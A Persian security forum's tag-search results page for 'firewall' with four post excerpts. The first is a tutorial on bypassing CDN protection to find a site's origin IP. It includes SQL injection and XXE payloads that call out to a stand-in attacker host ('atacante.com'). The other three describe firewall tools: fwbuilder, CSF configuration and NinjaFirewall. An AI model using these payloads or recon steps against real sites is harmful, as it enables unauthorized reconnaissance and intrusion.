رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'firewall'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • تالار اصلی سایت
    • قوانین سایت
    • پروژه های گروه
    • آسیب پذیری های کشف و گزارش شده
    • رقابت های فتح پرچم ( CTF )
    • بخش سوال و جواب های عمومی
  • بخش تست نفوذ پذیری
    • اخبار دنیای امنیت
    • باگ بانتی (Bug Bounty)
    • ابزارهای امنیتی و آنالیز سیستم ها
    • ویدیو های آموزشی آزمایشگاه امنیت
    • تحلیل و بررسی آسیب پذیری های سایت و سرورها
    • امنیت سیستم های شخصی
    • امنیت شبکه های وایرلس
    • ابزار و اسکریپت های امنیتی
    • Vulnerability Laboratory
  • بخش مدیریت شبکه
    • امنیت شبکه و سرور (Network Security)
    • آموزش های سرورهای ویندوز (Windows Server)
    • مدیریت شبکه
    • مجازی سازی
    • کشف جرائم رایانه ای (Forensics)
    • Library
  • بخش برنامه نویسی و کامپیوتر
    • کامپیوتر
    • برنامه نویسی تحت وب
    • برنامه نویسی تحت دسکتاپ
    • سیستم عامل
  • بخش کرک (Crack)

وبلاگ‌ها

چیزی برای نمایش وجود ندارد


جستجو در ...

نمایش نتایجی که شامل ...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


About Me


Name


Telegram


Instagram


Main os


Twitter


Skype

4 نتیجه پیدا شد

  1. Unkn0wn

    آموزش > Bypass Cdn Protection

    به نام خدا سلام خدمت همه استاید عزیز. مقدمه: پست های دیگه ای در این زمینه در انجمن وجود داره ولی این مقاله تقریبا همه اون پست ها رو شامل میشه و چند مورد رو از همه اونا بیشتر پوشش داده در این مقاله قصد دارم آموزش دور زدن یا بایپس CDN Protection رو با هم دیگه بررسی و یادبگیریم بنده تو تجربه خودم رو تو این زمینه در اختیار شما عزیزان میزارم تعدادی از مطالب که ذکر میکنم از طریق مطالعه و بعضی هم از طریق تجربه شخصی به دست اومده و چیز خاصی نیست. CDN (Content Delivery Network) چیست: تعریف بنده:یه سرویس هست که به عنوان یک ذخیره کننده اطلاعات اصلی در مجموعه پروک.سی است. این لایه امنیتی به صورت یک واسطه بین وبسایت و سرور عمل میکنه CDN های معروف: CloudFlare Google Cloud Amazon Cloud هستند. ---- فرض کنید یک سایت شما یک مراجعه کننده داره کامپیوتر های این لایه حفاظتی میان یک در خواست و وبسایت شما میفرستن و میتونه وب سایت شما رو مشاهده کنه. حالا اگر شما از یک CDN استفاده کنید زمانی که شخص بازدید کننده از سایت شما یک درخواست ارسال میکنه این لایه حفاظتی در خواست رو میگیره و به سایت شما ارسال میکنه و پاسخ ارسالی از سایت شما رو به اون نشون میده. بیشتر کاربرانی که از لایه حفاطتی (CDN) استفاده میکنن میخوان سایت خودشون رو در مقابل حملاتی مثل تکذیب سرویس (DDoS) است. این لایه حفاظتی تمام این در خواست ها رو دریافت میکنه و مانع رسیدن به سایت شما (Block) میشه. دور زدن لایه CDN (Bypass): چندین روش برای این کار وجود داره که به ترتیب به بررسی اونا میپردازیم! 1-ساب دامنه ها ( SubDomains ): برای پیدا کردن ساب دامنه ها میتونیم از ابزار های اسکرپیتی یا آنلاین در سطح نت استفاده کنیم ابزار آنلاین: Dnsdumpster ابزار اسکریپتی: Censys Sub finder استفاده از متور های جستجو گر به صورت دستی: site: site.com 2-ساب دامنه های ایندکس نشده (SubDomain Not Indexed): برای این کار میتونید از ابزار زیر استفاده کنید Fast Subdomain Scanner 2.1- بررسی DNS هاس (DNS Track): برای استفاده از این روش میتونید از سایت زیر استفاده کنید InToDNS 3-ابزار های اینترت اشیاء (IOT Tools): برای استفاده از این روش میتونید از سه متور جستجو گر مخصوص افراد نفوذ گر استفاده کنید Shodan Censys ZoomEye پ.ن این سه متور جستجوگر بسیار شبیه به هم هستند ولی من Shodan رو پیشنهاد میکنم. 4- ایمیل (Email headlines): در این روش باید یک ایمیل از طرف اون سایت دریافت کنید که نیازمند یکم خلاقیته. سپس به بخش گزینه های ایمیل مورد نظر برید و گزینه Show Originals رو بزنید به بررسی بپردازید. 5- ارتباط معکوس (Looking for Inverse Conection): در این روش میتونیم به PingBack در ورپرس اشاره کنیم pingback چیست: pingback سند xml تبادل پیوندهای برگشتیه 6- آپلود خارجی( External upload): در اکثر سایت ها به شما اجازه ثبت اپلود تصویر پروفایل داده میشه که به راحتی میتونید ای پی اصلی رو پیدا کنید فقط کافیه وقتی دارین اپلود میکنید از فایل log رو بررسی کنید که میتونید از inspect استفاده کنید در مرورگر خودتون. 7-SQLi: این روش زیاد استفاده نمیشه چون نیاز مند باگ SQL در سایت هستش. با استفاده از دسترسی به Database دستورات خودمون رو اجرا میکنیم مثل: MsSQL EXEC master.dbo.xp_cmdshell ‘ping -t 1 X.X.X.X’ MySQL SELECT * FROM table WHERE id=9 INTO DUMPFILE ‘/dev/tcp/atacante.com/80’ — – 8- XXE: زمانی که اسیب پذیری XMlL Injection وجود داره میتونیم ازش برای پیدا کردم آی پی اصلی استفاده کنیم مثل: <!ENTITY ping SYSTEM “http://atacante.com/save_request.php”> پایان امیدوارم مفید بوده باشه پ.ن:این مقاله کامل نیست اگر مشکلی داره به بزرگی خودتون ببخشید. یا کمک کنید برطرف بشه از طریق خصوصی #اختصاصی از ایران سایبر
  2. با سلام. یکی از برنام ههایی که برای مدیریت فایروال در ویندوز انجام میشه نرم افزار fwbuilder هستش. این نرم افزار همانند iptables سیستم عامل لینوکس هستش و gui خوب و کاربر پسندی داره. عکس برنامه پیسوت شد و می تونید از لینک زیر برنامه رو دانلود کنید. http://www.fwbuilder.org/4.0/docs/firewall_builder_packages.shtml
  3. سلام خدمت دوستان . Csf یا Configserver Security & Firewall یک نوع فایروال یا یک افزونه امنیتی برای سرور لینوکس ( بسته به کنترل پنل) میباشد ! بعضی مواقع مشاهده کرده اید درصورت Ban شدن ip کاربران توسط فایروال csf با اررور های مثل can n't connecT & ... و این چنین مواجه خواهند شد ! CSF قابلیتی دارد که با فعال سازی آن چنانچه IP کاربر مسدود گردید صفحه ای که خود تعریف کرده اید برای مسدود شدگان ظاهر خواهد شد . برای فعال کردن چنین قابلیت : ابتدا پکیج IO::socket::INET نصب کنید برای این کار وارد WHM شده و سپس گزینه Install a perl Module را انتخاب کنید ! و در لیست موجود IO::socket::INET:Daemon پیدا کنید وگزینه Install را بزنید ! حال فعال کردن سرویس Messenger : پس از نصب پکیج ذکر شده : دستور زیر را اجرا کرده useradd csf -s /bin/false به مسیر etc/csf/csf.conf/ رفته و با دستور nano فایل کانفیگ csf رو تغییر داده MESSENGER = “1” MESSENGER_TEMP = “1” MESSENGER_PERM = “1” MESSENGER_USER = “csf” حال یک بار CSF را ریستارت میکنیم csf -r و در اخر برای نمایش صفحه مورد نظر , پیج خود را با نام index.html در مسیر زیر ایجاد کنید : /etc/csf/messenger/
  4. فایروال امنیتی Ninja (نینجا) توسط گروه NinTechNet نوشته شده است که سایت های شمارا دربرابر حملاتی مثل : Cross Site Scripting Sql Injection Remote File Upload Remote Code Execution حفاظت و مانع اجرای اسکریپت و کدهای مخرب میشود . مشخصات فایروال : Developer: Nintechnet language: PHP Database: My SQL Runs On : Linux / Mac OS / BSD فایروال Wp 1.6 : http://up.iran-cyber.net/uploads/144699795511969_ninjafirewall.1.6.zip دانلود فایروال : http://webscripts.softpedia.com/script/Security-Systems/NinjaFirewall-75908.html#download Screen Shot های Wp رو میتونید داخل پوشه Screen مشاهده کنید .

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...